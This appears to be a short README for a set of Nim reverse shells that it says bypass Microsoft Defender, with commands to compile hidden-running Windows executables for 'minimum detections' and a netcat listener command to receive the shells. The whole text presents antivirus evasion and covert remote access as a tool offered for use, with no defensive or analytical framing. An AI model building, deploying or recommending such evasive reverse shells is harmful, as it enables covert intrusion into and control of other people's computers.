Simple reverse shells written in Nim that bypass Microsoft Defender detection.
- Windows 10/11
- UNIXes
For Windows compile to EXE using MinGW.
nim c -d:mingw NimShell1.nimFor Windows compile to EXE using MinGW: runs in the background once executed ("--app:gui" flag) - minimum detections.
nim c -d:mingw --app:gui NimShell2.nimnim c -d:mingw --app:gui NimShell3.nimnc -nvlp XXXXWhere XXXX is the listener's port.